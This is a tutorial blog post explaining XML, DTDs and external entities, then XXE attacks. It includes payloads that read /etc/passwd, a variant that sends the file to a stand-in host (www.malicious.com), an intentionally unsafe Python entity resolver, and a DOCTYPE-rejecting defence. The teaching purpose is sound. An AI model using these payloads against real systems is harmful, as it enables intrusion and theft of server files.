Tuesday, July 23, 2019

Hack Website Using XML External Entity Vulnerability

An XML External Entity (XXE) vulnerability involves exploiting how an application parses
XML input, more specifically, how it processes external entities included in that input.
To fully appreciate how this is exploited and what it makes possible, I think it’s best
for us to first understand what the eXtensible Markup Language (XML) and external
entities are.

A metalanguage is a language used for describing other languages, and that’s what XML
is. It was developed after HTML, in part as a response to the shortcomings of HTML,
which is used to define the display of data, focusing on how it should look. In contrast,
XML is used to define how data is to be structured.

For example, in HTML, you have tags like <title>, <h1>, <table>, <p>, etc., all of which are
used to define how content is to be displayed. The <title> tag defines a page’s
title (shocking), <h1> tags define headings, <table> tags present data in rows and
columns, and <p> tags present simple text. In contrast, XML has no predefined tags.
Instead, the person creating the XML document defines their own tags to describe the
content being presented. Here’s an example:


<?xml version="1.0" encoding="UTF-8"?>
<jobs>
<job>
<title>Hacker</title>
<compensation>1000000</compensation>
<responsibility optional="1">Shoot the web</responsibility>
</job>
</jobs>


Reading this, you can probably guess the purpose of the XML document: to present a
job listing. But you have no idea how it would look if it were presented on a web page. The
first line of the XML is a declaration header indicating the version of XML to be used and
the type of encoding. At the time of writing this, there are two versions of XML, 1.0 and 1.1.
Detailing the differences between 1.0 and 1.1 is beyond the scope of this book as they
should have no impact on your hacking.

After the initial header, the tag <jobs> is included and surrounds all other <job> tags,
which include <title>, <compensation> and <responsibility> tags. Now, whereas with HTML,
some tags don’t require closing tags (e.g., <br>), all XML tags require a closing tag
(or must be written as a self-closing tag, like <br/>).
Again, drawing on the example above, <jobs> is a starting tag and </jobs> would be the
corresponding ending tag. In addition, each tag has a name and can have attributes.
Using the tag <job>, the tag name is job but it has no attributes. <responsibility>, on the other
hand, has the name responsibility with an attribute optional made up of the attribute
name optional and attribute value 1.
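
To make the idea of tag names and attributes concrete, here is a minimal sketch that walks the job listing with Python's standard xml.etree.ElementTree module. The helper name describe is made up for this illustration and is not part of any library.

```python
import xml.etree.ElementTree as ET

# The job listing from the example above (XML declaration omitted for brevity).
JOBS_XML = """\
<jobs>
  <job>
    <title>Hacker</title>
    <compensation>1000000</compensation>
    <responsibility optional="1">Shoot the web</responsibility>
  </job>
</jobs>
"""

def describe(xml_text):
    """Return (tag name, attributes) pairs for every element, in document order."""
    root = ET.fromstring(xml_text)
    return [(elem.tag, dict(elem.attrib)) for elem in root.iter()]

for name, attributes in describe(JOBS_XML):
    print(name, attributes)
```

Only responsibility reports a non-empty attribute dictionary, which matches the description above: job has a name but no attributes, while responsibility carries optional with the value 1.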

Since anyone can define any tag, the obvious question then becomes, how does anyone
know how to parse and use an XML document if the tags can be anything? Well, a valid
XML document is valid because it follows the general rules of XML (no need for me to
list them all but having a closing tag is one example I mentioned above) and it matches
its document type definition (DTD). The DTD is the whole reason we’re diving into this
because it’s one of the things which will enable our exploit as hackers.
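
As a rough illustration of the "general rules of XML" part, the sketch below asks Python's xml.etree.ElementTree whether a snippet is well-formed. The function name is_well_formed is an assumption made for this example. Note that ElementTree is a non-validating parser, so this only checks the general rules (such as closing tags) and never compares the document against a DTD.

```python
import xml.etree.ElementTree as ET

def is_well_formed(xml_text):
    """Return True when the parser accepts the text as well-formed XML."""
    try:
        ET.fromstring(xml_text)
    except ET.ParseError:
        return False
    return True

# Every tag is closed properly.
print(is_well_formed("<job><title>Hacker</title></job>"))
# The <title> tag is never closed, so the parser rejects the document.
print(is_well_formed("<job><title>Hacker</job>"))
```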

An XML DTD is like a definition document for the tags being used and is developed by
the XML designer, or author. With the example above, I would be the designer since I
defined the jobs document in XML. A DTD will define which tags exist, what attributes
they may have and what elements may be found in other elements, etc. While you and
I can create our own DTDs, some have been formalized and are widely used, including
Really Simple Syndication (RSS), the Resource Description Framework (RDF), health care
information (HL7 SGML/XML), etc.

Here’s what a DTD file would look like for my XML above:


<!ELEMENT jobs (job)*>
<!ELEMENT job (title, compensation, responsibility)>
<!ELEMENT title (#PCDATA)>
<!ELEMENT compensation (#PCDATA)>
<!ELEMENT responsibility (#PCDATA)>
<!ATTLIST responsibility optional CDATA "0">

Looking at this, you can probably guess what most of it means. Our <jobs> tag is
declared as an XML !ELEMENT and can contain zero or more job elements (that is what
the * means). A job is an !ELEMENT which must contain a title, a compensation and a
responsibility, in that order, all of which are also !ELEMENTs and can only contain
character data, denoted by (#PCDATA). Lastly, the !ELEMENT responsibility has a
possible attribute (!ATTLIST) optional whose default value is 0.
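
Python's standard library parsers do not validate against a DTD, so the following is only a hand-written sketch of what "matching the DTD" means for this document. The CONTENT_MODEL table and the conforms function are hypothetical names invented here. They mirror the declarations above using the lowercase tag names from the XML example, and they are not a real DTD validator.

```python
import xml.etree.ElementTree as ET

# Hand-written mirror of the DTD: element name -> exact sequence of child elements.
# An empty tuple stands in for (#PCDATA), meaning text only and no child elements.
CONTENT_MODEL = {
    "job": ("title", "compensation", "responsibility"),
    "title": (),
    "compensation": (),
    "responsibility": (),
}

def conforms(elem):
    """Check one element and all of its descendants against CONTENT_MODEL."""
    children = [child.tag for child in elem]
    if elem.tag == "jobs":
        # (job)* allows zero or more job elements and nothing else.
        ok = all(tag == "job" for tag in children)
    elif elem.tag in CONTENT_MODEL:
        ok = tuple(children) == CONTENT_MODEL[elem.tag]
    else:
        ok = False  # the element was never declared
    return ok and all(conforms(child) for child in elem)

valid = ET.fromstring(
    "<jobs><job><title>Hacker</title><compensation>1000000</compensation>"
    "<responsibility optional='1'>Shoot the web</responsibility></job></jobs>"
)
incomplete = ET.fromstring("<jobs><job><title>Hacker</title></job></jobs>")

print(conforms(valid))       # all declared children present, in order
print(conforms(incomplete))  # compensation and responsibility are missing
```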

Not too difficult, right? In addition to DTDs, there are still two important tags we haven’t
discussed, the !DOCTYPE and !ENTITY tags. Up until this point, I’ve implied that DTD
files are external to our XML. Remember that in the first example above, the XML document
didn’t include the tag definitions; that was done by our DTD in the second example.

However, it’s possible to include the DTD within the XML document itself. To do so,
the document must contain a <!DOCTYPE> declaration right after the declaration header
and before the first tag. Combining our two examples above, we’d get a document that
looks like:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE jobs [
<!ELEMENT jobs (job)*>
<!ELEMENT job (title, compensation, responsibility)>
<!ELEMENT title (#PCDATA)>
<!ELEMENT compensation (#PCDATA)>
<!ELEMENT responsibility (#PCDATA)>
<!ATTLIST responsibility optional CDATA "0">
]>
<jobs>
<job>
<title>Hacker</title>
<compensation>1000000</compensation>
<responsibility optional="1">Shoot the web</responsibility>
</job>
</jobs>

Here, we have what’s referred to as an Internal DTD Declaration. Notice that we still begin
with a declaration header indicating our document conforms to XML 1.0 with UTF-8
encoding, but immediately after, we define our DOCTYPE for the XML to follow. Using
an external DTD would be similar except the !DOCTYPE would look like <!DOCTYPE jobs
SYSTEM "jobs.dtd"> . The XML parser would then parse the contents of the jobs.dtd file
when parsing the XML file. This is important because the !ENTITY tag is treated similarly
and provides the crux for our exploit.
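
To see that a parser really does read the declarations inside an internal DTD, the sketch below uses the declaration handlers of Python's xml.parsers.expat module to list what a jobs document declares. The function name list_declarations is made up for this example, and the DTD uses lowercase names so they match the tags in the document.

```python
import xml.parsers.expat

DOCUMENT = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE jobs [
<!ELEMENT jobs (job)*>
<!ELEMENT job (title, compensation, responsibility)>
<!ELEMENT title (#PCDATA)>
<!ELEMENT compensation (#PCDATA)>
<!ELEMENT responsibility (#PCDATA)>
<!ATTLIST responsibility optional CDATA "0">
]>
<jobs></jobs>
"""

def list_declarations(document):
    """Return the element names and attribute defaults declared in the DTD."""
    elements, attributes = [], []
    parser = xml.parsers.expat.ParserCreate()
    # Called once per <!ELEMENT ...> declaration.
    parser.ElementDeclHandler = lambda name, model: elements.append(name)
    # Called once per attribute declared in an <!ATTLIST ...>.
    parser.AttlistDeclHandler = (
        lambda elname, attname, type_, default, required:
            attributes.append((elname, attname, default))
    )
    parser.Parse(document, True)
    return elements, attributes

elements, attributes = list_declarations(DOCUMENT)
print(elements)
print(attributes)
```

The parser processes the DTD before it reaches the first tag, which is the behavior the rest of this post builds on.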

An XML entity is like a placeholder for information. Using our previous example again,
if we wanted every job to include a link to our website, it would be tedious for us to
write the address every time, especially if our URL could change. Instead, we can use an
!ENTITY and get the parser to fetch the contents at the time of parsing and insert the
value into the document. I hope you see where I’m going with this.
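
Before looking at entities that fetch their value from somewhere else, here is a small sketch of the placeholder idea using an internal entity, where the value is written directly in the DTD. The URL and the function name websites are assumptions for illustration only. Python's xml.etree.ElementTree expands this kind of entity while parsing.

```python
import xml.etree.ElementTree as ET

DOCUMENT = """\
<!DOCTYPE jobs [
<!ENTITY url "https://www.example.com/jobs">
]>
<jobs>
  <job><title>Hacker</title><website>&url;</website></job>
  <job><title>Tester</title><website>&url;</website></job>
</jobs>
"""

def websites(xml_text):
    """Return the text of every <website> element after entity expansion."""
    root = ET.fromstring(xml_text)
    return [site.text for site in root.iter("website")]

# The address is written once in the DTD and substituted at every &url; reference.
print(websites(DOCUMENT))
```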

Similar to an external DTD file, we can update our XML file to include this idea:


<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE jobs [
<!ELEMENT jobs (job)*>
<!ELEMENT job (title, compensation, responsibility, website)>
<!ELEMENT title (#PCDATA)>
<!ELEMENT compensation (#PCDATA)>
<!ELEMENT responsibility (#PCDATA)>
<!ATTLIST responsibility optional CDATA "0">
<!ELEMENT website ANY>
<!ENTITY url SYSTEM "website.txt">
]>
<jobs>
<job>
<title>Hacker</title>
<compensation>1000000</compensation>
<responsibility optional="1">Shoot the web</responsibility>
<website>&url;</website>
</job>
</jobs>

Here, you’ll notice I’ve gone ahead and added a website !ELEMENT but instead of
(#PCDATA), I’ve added ANY. This means the website tag can contain any combination
of parsable data. I’ve also defined an !ENTITY with the SYSTEM keyword, telling the parser
to get the contents of the website.txt file. Things should be getting clearer now.

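Putting this all together, what do you think would happen if instead of “website.txt”, I
included “/etc/passwd”? As you probably guessed, our XML would be parsed and the
contents of the sensitive server file /etc/passwd would be included in our content. But
we’re the authors of the XML, so why would we do that? The answer is that the attack
becomes possible whenever an application accepts XML from its users and parses it
without restricting external entities. Suppose I ran a site that accepted XML and you,
as a hacker, submitted: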


<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >
]
>
<foo>&xxe;</foo>

As you now know, my parser would receive this and recognize an internal DTD defining
a foo document type, telling it foo can include any parsable data and that there’s an
!ENTITY xxe which should read my /etc/passwd file when the document is parsed
(file:// denotes a full file URI path to /etc/passwd) and replace each &xxe;
reference with those file contents. Then, you finish it off with the valid XML defining a
<foo> tag, which prints my server info. And that, friends, is why XXE is so dangerous.
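
To show what a parser that resolves external entities is doing on the server side, here is a deliberately unsafe sketch built on Python's xml.parsers.expat module. Everything about it is an assumption for illustration: the function name parse_resolving_external_entities is made up, the resolver naively treats the SYSTEM identifier as a local path, and a temporary file containing demo-secret stands in for a sensitive file so the demo never touches /etc/passwd.

```python
import os
import tempfile
import xml.parsers.expat

def parse_resolving_external_entities(document):
    """Parse XML the unsafe way: load every SYSTEM entity from the local disk."""
    chunks = []
    parser = xml.parsers.expat.ParserCreate()
    parser.CharacterDataHandler = chunks.append

    def resolve(context, base, system_id, public_id):
        # Deliberately naive: trust the SYSTEM identifier and open it as a path.
        with open(system_id, "rb") as handle:
            sub_parser = parser.ExternalEntityParserCreate(context)
            sub_parser.Parse(handle.read(), True)
        return 1  # a non-zero value tells expat the entity was handled

    parser.ExternalEntityRefHandler = resolve
    parser.Parse(document, True)
    return "".join(chunks)

# Stand-in for a sensitive server file.
with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as secret:
    secret.write("demo-secret")

payload = f"""<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "{secret.name}">
]>
<foo>&xxe;</foo>"""

leaked = parse_resolving_external_entities(payload)
os.remove(secret.name)
print(leaked)
```

The text collected from the foo element is the content of the file named in the DTD, even though the submitted document never contained that content itself.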

But wait, there’s more. What if the application didn’t print out a response and only parsed
your content? Using the example above, the contents would be parsed but never returned
to us. Well, what if instead of including a local file, you decided you wanted to contact a
malicious server like so:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY % xxe SYSTEM "file:///etc/passwd" >
<!ENTITY callhome SYSTEM "www.malicious.com/?%xxe;">
]
>
<foo>&callhome;</foo>

Before explaining this, you may have picked up on the use of the % instead of the &
in the callhome URL, %xxe;. This is because the % is used when the entity is to be
evaluated within the DTD definition itself (a parameter entity) and the & when the
entity is evaluated in the XML document (a general entity). The idea is that, when the
XML document is parsed, the callhome !ENTITY will read the contents of the /etc/passwd
file and make a remote call to www.malicious.com, sending the file contents as a URL
parameter. Since we control that server, we can check our logs and, sure enough, have
the contents of /etc/passwd. Game over for the web application. Treat the payload above
as a simplified illustration, though: a conforming parser does not expand %xxe; inside a
quoted SYSTEM identifier, so real-world variants of this attack usually assemble the URL
in a DTD hosted on the attacker’s server.
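
The difference between the two kinds of entity can be observed without resolving anything. The sketch below, which assumes Python's xml.parsers.expat module and a made-up function name declared_entities, only records how the parser reports each declaration. The document body does not reference either entity, so no file is read and no request is made.

```python
import xml.parsers.expat

DOCUMENT = """<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY % xxe SYSTEM "file:///etc/passwd">
<!ENTITY callhome SYSTEM "www.malicious.com/?%xxe;">
]>
<foo>no entity is referenced here</foo>"""

def declared_entities(document):
    """Return (name, is_parameter_entity, system_id) for each declared entity."""
    found = []
    parser = xml.parsers.expat.ParserCreate()

    def on_entity(name, is_parameter, value, base, system_id, public_id, notation):
        found.append((name, bool(is_parameter), system_id))

    parser.EntityDeclHandler = on_entity
    parser.Parse(document, True)
    return found

for entry in declared_entities(DOCUMENT):
    print(entry)
```

The entity declared with % is flagged as a parameter entity and callhome as a general one. The SYSTEM identifier of callhome is reported with the literal text %xxe; still in it, since this parser does not substitute entities inside a quoted SYSTEM identifier.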

So, how do sites protect themselves against XXE vulnerabilities? They disable the parsing of
external entities.
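
How this is done depends on the parser in use. As one possible sketch in Python, an application that never needs DTDs can refuse any submitted document that contains a DOCTYPE at all, which rules out entity declarations entirely. The names ForbiddenDTD, reject_doctype and parse_untrusted are assumptions for this example and are not part of the standard library. The third-party defusedxml package offers a similar option, though it is not used here.

```python
import xml.etree.ElementTree as ET
import xml.parsers.expat

class ForbiddenDTD(ValueError):
    """Raised when untrusted XML carries a DOCTYPE declaration."""

def reject_doctype(document):
    """Raise ForbiddenDTD if the document contains a DOCTYPE."""
    def on_doctype(name, system_id, public_id, has_internal_subset):
        raise ForbiddenDTD(f"DOCTYPE {name!r} is not allowed")

    parser = xml.parsers.expat.ParserCreate()
    parser.StartDoctypeDeclHandler = on_doctype
    parser.Parse(document, True)

def parse_untrusted(document):
    """Parse user-supplied XML only after confirming it has no DTD."""
    reject_doctype(document)  # no DTD means no entity declarations
    return ET.fromstring(document)

XXE_PAYLOAD = """<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<foo>&xxe;</foo>"""

print(parse_untrusted("<foo>hello</foo>").text)
try:
    parse_untrusted(XXE_PAYLOAD)
except ForbiddenDTD as error:
    print("rejected:", error)
```

This sketch parses the input twice to keep the check separate from the application's own parsing. Rejecting the DOCTYPE outright is stricter than disabling external entities alone, which is a reasonable trade-off when submitted documents have no legitimate need for a DTD.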